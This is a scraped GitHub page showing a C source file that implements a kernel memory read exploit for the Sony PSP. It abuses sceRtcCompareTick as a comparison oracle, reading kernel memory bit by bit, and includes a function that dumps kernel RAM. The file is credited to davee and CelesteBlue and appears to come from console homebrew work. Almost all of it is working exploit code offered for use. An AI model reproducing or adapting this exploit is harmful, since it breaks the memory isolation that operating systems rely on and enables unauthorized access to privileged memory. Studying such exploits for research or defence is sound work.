-
Notifications
You must be signed in to change notification settings - Fork 4
/
Copy pathkernel_read.c
56 lines (48 loc) · 1.42 KB
/
kernel_read.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
#include <time.h>
#include <pspsdk.h>
#include <psprtc.h>
/*
sceRtcCompareTick kernel exploit by davee, implementation by CelesteBlue
*/
// input: 4-byte-aligned kernel address to a 64-bit integer
// return *addr >= value;
static int is_ge_u64(uint32_t addr, uint32_t *value) {
return (int)sceRtcCompareTick((uint64_t *)value, (uint64_t *)addr) <= 0;
}
// input: 4-byte-aligned kernel address
// return *addr
uint64_t pspXploitKernelRead64(uint32_t addr) {
uint32_t value[2] = {0, 0};
uint32_t res[2] = {0, 0};
int bit_idx = 0;
for (; bit_idx < 32; bit_idx++) {
value[1] = res[1] | (1 << (31 - bit_idx));
if (is_ge_u64(addr, value)) {
res[1] = value[1];
}
}
value[1] = res[1];
bit_idx = 0;
for (; bit_idx < 32; bit_idx++) {
value[0] = res[0] | (1 << (31 - bit_idx));
if (is_ge_u64(addr, value)) {
res[0] = value[0];
}
}
return ((uint64_t)res[1] << 32) | res[0];
}
void pspXploitDumpKernel(u32* dst, u32* src, u32 size) {
#ifdef DEBUG
pspDebugScreenPrintf("Reading %d bytes of kernel ram @ %p\n", size, src);
#endif
if ((u32)src+size >= 0x88400000) size = 0x88400000 - (u32)src;
u32 count = 0;
while (count < size){
u64 ret = pspXploitKernelRead64((u32)src);
dst[0] = (uint32_t) ret;
dst[1] = (uint32_t)(ret >> 32);
dst += 2;
src += 2;
count += 8;
}
}